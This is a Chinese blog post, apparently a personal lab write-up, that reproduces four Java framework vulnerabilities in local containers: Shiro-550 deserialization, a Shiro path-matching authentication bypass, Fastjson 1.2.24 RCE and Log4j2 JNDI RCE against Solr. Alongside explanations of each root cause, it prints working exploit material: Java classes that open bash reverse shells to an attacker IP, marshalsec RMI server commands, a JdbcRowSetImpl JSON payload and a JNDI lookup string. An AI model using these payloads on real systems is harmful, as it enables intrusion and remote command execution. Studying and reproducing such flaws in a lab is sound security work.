<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="theme-color" content="#1a1a1a"><meta name="msapplication-navbutton-color" content="#1a1a1a"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"><title>学习日常</title><script>(function() {
  // 尽早应用暗色模式，防止闪烁
  var savedDarkMode = localStorage.getItem('darkMode') === 'true';
  if (savedDarkMode) {
    document.documentElement.classList.add('dark-mode');
  }
})();
</script><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&amp;family=Playfair+Display:wght@400;500;600;700&amp;family=Fira+Code:wght@400;500&amp;display=swap" rel="stylesheet"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"><script src="https://cdnjs.cloudflare.com/ajax/libs/qrcodejs/1.0.0/qrcode.min.js"></script><link rel="icon" href="/images/favicon.ico">
<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="/css/tags.css">

<link rel="stylesheet" href="/css/categories.css">

<link rel="stylesheet" href="/css/categories-accordion.css">

<link rel="stylesheet" href="/css/highlight.css">

<link rel="stylesheet" href="/css/toc.css">

<link rel="stylesheet" href="/css/image-zoom.css">

<link rel="stylesheet" href="/css/share.css">

<link rel="stylesheet" href="/css/mobile-nav.css">

<link rel="stylesheet" href="/css/search.css">

<link rel="stylesheet" href="/css/scrollbar.css">

<link rel="stylesheet" href="/css/timeline.css">

<link rel="stylesheet" href="/css/animations.css">

<link rel="stylesheet" href="/css/ai-theme.css">

<link rel="stylesheet" href="/css/loading-animation.css">
<!-- 条件加载关于页面样式--><style>:root {
  --primary-color: #1a1a1a;
  --secondary-color: #666666;
  --accent-color: #ff6b6b;
  --background-color: #ffffff;
  --text-color: #333333;
  --overlay-color: rgba(0, 0, 0, 0.7);
  --tag-background-color: #ffffff;
  --card-background-color: #ffffff;
}
</style><meta name="generator" content="Hexo 7.3.0"></head><body><div id="app"><header class="header navbar-bubble"><nav class="nav"><div class="nav-container"><div class="nav-logo"><a href="/"><span class="nav-title">学习日常</span></a></div><div class="nav-menu"><a class="nav-item" href="/">首页</a><a class="nav-item" href="/about/">关于</a><a class="nav-item" href="/archives/">归档</a><a class="nav-item" href="/categories/">分类</a><a class="nav-item" href="/tags/">标签</a><!-- 搜索按钮--><div class="search-toggle"><i class="fas fa-search"></i></div></div><div class="nav-toggle"><span></span><span></span><span></span></div></div></nav></header><div class="search-overlay"><div class="search-container"><div class="search-form"><input class="search-input" type="text" placeholder="搜索文章..."/><div class="search-close">×</div></div><div class="search-results"></div></div></div><main class="main"><div class="post-wrapper"><div class="toc-sidebar"><div class="toc-container"><div class="toc-title">目录</div><div class="toc-content" id="table-of-contents"><!-- Table of contents will be generated by JavaScript--></div></div></div><article class="post-container"><div class="post-header"><div class="post-meta"><div class="post-category"><a href="/categories/Java/">Java</a></div><div class="post-date"><time datetime="2025-12-25T08:00:00.000Z">十二月 25, 2025</time></div><div class="post-author"><span>By 原</span></div></div><h1 class="post-title">Java框架漏洞复现</h1><div class="post-tags"><a class="tag" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a></div></div><!-- AI摘要模块容器--><div id="post-ai-container"></div><div class="post-content"><h1 id="shiro550漏洞"><a href="#shiro550漏洞" class="headerlink" title="shiro550漏洞"></a>shiro550漏洞</h1><h3 id="核心原理"><a href="#核心原理" class="headerlink" title="核心原理"></a>核心原理</h3><ol>
<li><strong>rememberMe 流程</strong>：勾选 “记住我” 后，服务端将用户身份序列化 → AES（CBC&#x2F;PKCS5Padding）加密 → Base64 编码，存入 rememberMe Cookie；客户端请求时反向解码 &#x2F; 解密 &#x2F; 反序列化以恢复身份。</li>
<li><strong>密钥硬编码</strong>：默认 AES 密钥（Base64）为 kPH+bIxk5D2deZiIxcaaaA&#x3D;&#x3D;，长期公开且硬编码在框架中，开发者未替换则可被攻击者复用。</li>
<li><strong>恶意构造与触发</strong>：攻击者生成含 Gadget 链（如 Commons Collections）的恶意 Java 序列化 Payload，用默认密钥 AES 加密→Base64 编码，替换 rememberMe Cookie 发送；服务端反序列化时执行恶意代码。</li>
</ol>
<h3 id="触发条件"><a href="#触发条件" class="headerlink" title="触发条件"></a>触发条件</h3><ul>
<li>启用 rememberMe 且未更换默认密钥；</li>
<li>目标 classpath 存在可利用的 Gadget 链；</li>
<li>未禁用 Java 原生反序列化或未改用安全序列化。</li>
</ul>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p><img src="/image/image-20251222193717805.png" alt="image-20251222193717805"></p>
<p>抓包发现存在rememberMe&#x3D;deleteMe字段，可以确定是Shiro框架。</p>
<p>同时ShiroScan插件可以自动检测该字段。</p>
<h4 id="liqun"><a href="#liqun" class="headerlink" title="liqun"></a>liqun</h4><p>使用内置key检测发现可利用点</p>
<p><img src="/image/image-20251222194903181.png" alt="image-20251222194903181"></p>
<p>尝试执行命令，成功</p>
<p><img src="/image/image-20251222195147538.png" alt="image-20251222195147538"></p>
<p>在kali设置监听端口，这里使用8080端口，设置好监听端口之后，填写对应的IP和端口即可进行反弹shell</p>
<p><img src="/image/image-20251222195725010.png" alt="image-20251222195725010"></p>
<p>在kali中可以也可以看到执行成功，能够进行任意命令执行</p>
<p><img src="/image/image-20251222195947132.png" alt="image-20251222195947132"></p>
<h1 id="shiro权限绕过"><a href="#shiro权限绕过" class="headerlink" title="shiro权限绕过"></a>shiro权限绕过</h1><h3 id="核心原理-1"><a href="#核心原理-1" class="headerlink" title="核心原理"></a>核心原理</h3><ol>
<li><strong>路径匹配差异</strong>：Shiro 的 AntPathMatcher 对 <code>/admin/*</code> 等规则采用严格字符串匹配，不自动归一化结尾 <code>/</code>；而 Spring Web 的 AntPathMatcher 通常会归一化（如 <code>/admin/</code> 与 <code>/admin</code> 视为同一路径）。例如：Shiro 拦截 <code>/admin/*</code> 不匹配 <code>/admin/123/</code>，但 Spring 仍路由到 <code>/admin/123</code> 对应的控制器，从而绕过 authc。</li>
<li><strong>分号截断与归一化差异</strong>：Shiro 在处理含 <code>;</code> 的 URL 时会截断分号后的内容（如 <code>/admin;xxx</code> 解析为 <code>/admin</code>），而 Spring 可能保留并归一化，进一步扩大绕过面。</li>
</ol>
<h3 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>抓包发现admin路由，但是无法直接直接访问，且会重定向到登录页面。</p>
<p><img src="/image/image-20251222203025127.png" alt="image-20251222203025127"></p>
<p><img src="/image/image-20251222203121050.png" alt="image-20251222203121050"></p>
<p>借助shiro和spring的路径匹配差异构造palyload：&#x2F;xxx&#x2F;..;&#x2F;admin&#x2F;</p>
<p>在使用了shiro的项目中，是我们请求的URL（URL1），进过shiro权限检验（URL2）， 最后到springboot项目找到路由来处理（URL3）</p>
<p>URL1会进行标准化处理，将原本的URL处理为&#x2F;xxx&#x2F;..，这时候shiro的权限检测会将他和&#x2F;admin&#x2F;进行匹配，显然不会匹配成功，这样就绕过了shiro的检测，不会再重定向。但是在springboot项目中的匹配模式不同，能够找到&#x2F;admin&#x2F;路由进行访问。</p>
<p>这样就成功进入原本需要登录的页面</p>
<p><img src="/image/image-20251222205353501.png" alt="image-20251222205353501"></p>
<h1 id="fastjson反序列化"><a href="#fastjson反序列化" class="headerlink" title="fastjson反序列化"></a>fastjson反序列化</h1><p>Fastjson 1.2.24 反序列化导致任意命令执行漏洞</p>
<h3 id="核心原理-2"><a href="#核心原理-2" class="headerlink" title="核心原理"></a>核心原理</h3><p>Fastjson 反序列化的核心逻辑是：将 JSON 字符串解析为 Java 对象时，支持通过 <code>@type</code> 字段指定目标类，且会<strong>自动调用该类的 setter 方法 &#x2F; 构造方法 &#x2F; 字段赋值逻辑</strong>。</p>
<p>1.2.24 版本的关键缺陷：</p>
<ol>
<li><strong>无限制的类加载</strong>：未对 <code>@type</code> 指定的类进行严格校验，允许加载任意 JDK 内置类或第三方依赖类；</li>
<li><strong>危险方法自动触发</strong>：在反序列化过程中，Fastjson 会通过反射调用目标类的 <code>setter</code> 方法、<code>getter</code> 方法甚至构造方法，若目标类的这些方法包含危险逻辑（如执行命令、读写文件），则会被恶意利用；</li>
<li><strong>依赖 JDK 原生类的 “gadget”（利用链）</strong>：JDK 中部分类本身包含可执行命令的逻辑，结合 Fastjson 的反序列化机制，可被拼接成完整的攻击链。</li>
</ol>
<h3 id="漏洞利用-2"><a href="#漏洞利用-2" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>启动容器之后可以看到这个页面</p>
<p><img src="/image/image-20251222212646631.png" alt="image-20251222212646631"></p>
<p>创建一个test.java文件，并在jdk-8的环境下编译。</p>
<p><img src="/image/image-20251222212623512.png"></p>
<p>test.java文件的内容</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 文件名：test.java（必须和RMI的#test一致，大小写敏感）</span></span><br><span class="line"><span class="keyword">import</span> java.lang.Runtime;</span><br><span class="line"><span class="keyword">import</span> java.lang.Process;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">test</span> &#123;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">// 执行简单命令：在容器/tmp下创建success文件（易验证）</span></span><br><span class="line">            <span class="type">Runtime</span> <span class="variable">rt</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">            String[] cmd = &#123;<span class="string">&quot;/bin/bash&quot;</span>, <span class="string">&quot;-c&quot;</span>, <span class="string">&quot;touch /tmp/success&quot;</span>&#125;;</span><br><span class="line">            <span class="type">Process</span> <span class="variable">p</span> <span class="operator">=</span> rt.exec(cmd);</span><br><span class="line">            p.waitFor();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>使用python启动一个简易的HTTP服务器，端口为5623</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pyton -m http.server <span class="number">5623</span></span><br></pre></td></tr></table></figure>

<p>这个时候我们需要启动一个<code>rmi</code>服务器，然后这个<code>rmi</code>服务器会在本机监听，如果有人远程调用<code>test</code>方法，就会访问python共享的<code>test.class</code></p>
<p><img src="/image/image-20251222213101340.png" alt="image-20251222213101340"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer &quot;http://172.31.4.79:5623/#test&quot; 8653</span><br></pre></td></tr></table></figure>

<p>最后抓包一个并修改为POST请求</p>
<p><img src="/image/image-20251222213237314.png" alt="image-20251222213237314"></p>
<p>POST请求的内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: 127.0.0.1:8081</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Pragma: no-cache</span><br><span class="line">Cache-Control: no-cache</span><br><span class="line">Content-Type: application/json</span><br><span class="line">Content-Length: 158</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">&quot;b&quot;:&#123;</span><br><span class="line">          &quot;@type&quot;:&quot;com.sun.rowset.JdbcRowSetImpl&quot;,</span><br><span class="line">          &quot;dataSourceName&quot;:&quot;rmi://172.31.4.79:8653/test&quot;,</span><br><span class="line">          &quot;autoCommit&quot;:true</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里看到回复是500，但是在我们的服务器中可以看见成功请求了test.class文件</p>
<p><img src="/image/image-20251222213316284.png" alt="image-20251222213316284"></p>
<p>之后进入容器，查看是否生成&#x2F;tmp&#x2F;successs。若生成则成功触发fastjson漏洞</p>
<p><img src="/image/image-20251222214613708.png" alt="image-20251222214613708"></p>
<h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><p>修改test.java的内容</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.Runtime;</span><br><span class="line"><span class="keyword">import</span> java.lang.Process;</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">test</span>&#123;</span><br><span class="line">        <span class="keyword">static</span> &#123;</span><br><span class="line">                <span class="keyword">try</span>&#123;</span><br><span class="line">                        <span class="type">Runtime</span> <span class="variable">rt</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">                    <span class="comment">//这里将命令修改为反弹shell的命令</span></span><br><span class="line">                        String[] commands = &#123;<span class="string">&quot;bash&quot;</span>, <span class="string">&quot;-c&quot;</span>, <span class="string">&quot;bash -i &gt;&amp;  /dev/tcp/172.31.4.79/4563 0&gt;&amp;1&quot;</span>&#125;;</span><br><span class="line">                        <span class="type">Process</span> <span class="variable">pc</span> <span class="operator">=</span> rt.exec(commands);</span><br><span class="line">                        pc.waitFor();</span><br><span class="line">                &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">                        <span class="comment">// do nothing</span></span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>重新编译</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javac -source 8 -target 8 test.java</span><br></pre></td></tr></table></figure>

<p>在攻击机监听4563端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvnp 4563  # -l=监听 -v=详细输出 -n=不解析域名 -p=指定端口</span><br></pre></td></tr></table></figure>

<p>重新发送payload</p>
<p><img src="/image/image-20251222215724374.png" alt="image-20251222215724374"></p>
<p>此时不显示回复内容即为反弹成功</p>
<p>查看监听端口，可以执行任意命令即为成功</p>
<p><img src="/image/image-20251222215833696.png" alt="image-20251222215833696"></p>
<h1 id="log4j2-rce"><a href="#log4j2-rce" class="headerlink" title="log4j2 rce"></a>log4j2 rce</h1><h3 id="核心原理-3"><a href="#核心原理-3" class="headerlink" title="核心原理"></a>核心原理</h3><ol>
<li><p><strong>Log4j2 的日志记录特性</strong>：Log4j2 支持<code>$&#123;&#125;</code>语法的 “Lookup（变量替换）” 功能，可在日志中动态解析变量（如<code>$&#123;env:USER&#125;</code>获取系统环境变量）。</p>
</li>
<li><p><strong>JNDI Lookup 的风险</strong>：Log4j2 默认支持<code>$&#123;jndi:&#125;</code>协议的 Lookup，而 JNDI（Java 命名和目录接口）可通过 LDAP&#x2F;RMI 等协议远程加载资源。</p>
</li>
<li><p>恶意注入流程</p>
<p>：</p>
<ul>
<li>攻击者构造包含<code>$&#123;jndi:ldap/rmi://恶意服务器地址/恶意类&#125;</code>的输入；</li>
<li>靶机服务将该输入记录到日志时，Log4j2 会解析<code>$&#123;jndi:&#125;</code>并向恶意服务器发起请求；</li>
<li>恶意服务器返回恶意 Java 类的地址，靶机加载并执行该类中的代码（如反弹 Shell）</li>
</ul>
</li>
</ol>
<h3 id="漏洞利用-3"><a href="#漏洞利用-3" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>靶机和攻击机均为Ubuntu：172.31.4.79</p>
<p>启动该容器可以看到该界面，很明显是使用了solr服务（一个基于 Java 的搜索引，而 Solr 默认使用 Log4j2 作为日志组件）</p>
<p><img src="/image/image-20251224173353063.png" alt="image-20251224173353063"></p>
<p>攻击机执行nc -lvvp 9999监听9999端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">vim Exploit.java</span><br><span class="line">javac Exploit.java -source 8 -target 8</span><br></pre></td></tr></table></figure>

<p><img src="/image/image-20251224174553425.png" alt="image-20251224174553425"></p>
<p>创建Exploit.java恶意文件，并编译</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.Runtime;</span><br><span class="line"><span class="keyword">import</span> java.lang.Process;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Exploit</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">Exploit</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">// 反弹 Shell 命令（替换为攻击机 IP 和端口）</span></span><br><span class="line">            <span class="type">Runtime</span> <span class="variable">rt</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">            String[] cmd = &#123;<span class="string">&quot;/bin/bash&quot;</span>, <span class="string">&quot;-c&quot;</span>, <span class="string">&quot;bash -i &gt;&amp; /dev/tcp/172.31.4.79/9999 0&gt;&amp;1&quot;</span>&#125;;</span><br><span class="line">            <span class="type">Process</span> <span class="variable">pc</span> <span class="operator">=</span> rt.exec(cmd);</span><br><span class="line">            pc.waitFor();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            <span class="comment">// 忽略异常</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">Exploit</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在创建Exploit.java的目录启动简易的HTTP服务器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">\# Python 3 启动 HTTP 服务，端口 8080</span><br><span class="line">python3 -m http.server 8080</span><br></pre></td></tr></table></figure>

<p><img src="/image/image-20251224174526631.png" alt="image-20251224174526631"></p>
<p>在 marshalsec 目录执行，启动 RMI 服务并指定恶意类的 HTTP 地址：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer</span><br><span class="line">&quot;http://172.31.4.79:8080/#Exploit&quot; 1099</span><br></pre></td></tr></table></figure>

<p><img src="/image/image-20251224174614874.png" alt="image-20251224174614874"></p>
<p>打开burp抓包，发现存在&#x2F;solr&#x2F;admin&#x2F;cores和&#x2F;solr&#x2F;admin&#x2F;info&#x2F;system，这两个是solr的核心接口。</p>
<p>对这两个接口进行访问时，Solr 会将<strong>请求的 HTTP 头（如 User-Agent、Referer）、URL 参数</strong>等信息，通过 Log4j2 记录到日志中；之后在利用Log4j2 会解析<code>$&#123;jndi:&#125;</code>并向恶意服务器发起请求的原理进行任意命令执行。</p>
<p>本次复现利用第一个，这个更加稳定且便于复现</p>
<p><img src="/image/image-20251224174852925.png" alt="image-20251224174852925"></p>
<p>借助GET传参将payload：**${jndi:rmi:&#x2F;&#x2F;172.31.4.79:1099&#x2F;Exploit}**传入</p>
<p>可以看到成功发送</p>
<p><img src="/image/image-20251224175438765.png" alt="image-20251224175438765"></p>
<p>这时查看攻击机的监听端口，发现反弹成功，能够执行任意命令</p>
<p><img src="/image/image-20251224175630195.png" alt="image-20251224175630195"></p>
</div><!-- 初始化AI摘要--><!-- 传递TOC配置给前端--><script>// 创建全局TOC配置对象
window.tocConfig = {
  empty_toc_behavior: "placeholder"
};
</script><div class="post-navigation"><div class="post-nav next"><a href="/2025/11/23/hello-world/"><span class="nav-label">Next →</span><span class="nav-title">Hello World：编程入门的第一个里程碑</span></a></div></div><div class="post-share"><h3 class="share-title">Share this article</h3><div class="share-buttons"><a class="share-btn wechat" href="#" data-wechat="/2025/12/25/Java%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><span>微信</span></a><a class="share-btn qq" href="https://connect.qq.com/widget/shareqq/index.html?url=%2F2025%2F12%2F25%2FJava%25E6%25A1%2586%25E6%259E%25B6%25E6%25BC%258F%25E6%25B4%259E%25E5%25A4%258D%25E7%258E%25B0%2F&amp;title=Java%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0" target="_blank" rel="noopener"><span>QQ</span></a><a class="share-btn copy" href="#" data-copy="/2025/12/25/Java%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><span>Copy Link</span></a></div></div></article></div></main><footer class="footer"><div class="footer-bottom"><div class="footer-copyright">© 2025 原. All rights reserved.</div><!-- Footer centered image with link--></div></footer></div><!-- 立即应用暗色模式，避免页面闪烁--><script>(function() {
  // 检查本地存储中的暗色模式设置
  const savedDarkMode = localStorage.getItem('darkMode') === 'true';
  // 如果设置为暗色模式，立即应用到body
  if (savedDarkMode) {
    document.body.classList.add('dark-mode');
  }

  // 防止页面闪烁，在DOM加载完成前设置一个初始类
  document.documentElement.style.visibility = 'hidden';
  document.addEventListener('DOMContentLoaded', function() {
    document.documentElement.style.visibility = 'visible';
  });
})();
</script>
<script src="/js/main.js"></script>

<script src="/js/tags.js"></script>

<script src="/js/categories-accordion.js"></script>

<script src="/js/highlight.js"></script>

<script src="/js/load-more.js"></script>

<script src="/js/header-scroll.js"></script>

<script src="/js/toc.js"></script>

<script src="/js/image-zoom.js"></script>

<script src="/js/share.js"></script>

<script src="/js/search.js"></script>

<script src="/js/hide-inline-interaction.js"></script>

<script src="/js/hide-toggle-interaction.js"></script>

<script src="/js/dark-mode-sync.js"></script>

<script src="/js/animations.js"></script>

<script src="/js/ai-theme.js"></script>

<script src="/js/loading-animation.js"></script>
<script>window.theme = {
  features: {"dark_mode":true,"smooth_scroll":true,"back_to_top":true,"loading_animation":true},
  code_block: {"height_limit":200,"enable_folding":true,"max_height":"300px","show_lang":true},
  ai_summary: {"enable":false,"api_key":"","summary_directly":false,"ai_name":"然-AI","ai_introduce":"我是文章辅助AI: 然-AI，一个基于deepseek的强大语言模型，有什么可以帮到您？😊","ai_version":"deepseekv3","buttons":["介绍自己","来点灵感","生成AI简介"]},
  categories: {"layout":"accordion","accordion_animation":true,"show_empty_categories":true}
};
</script></body></html>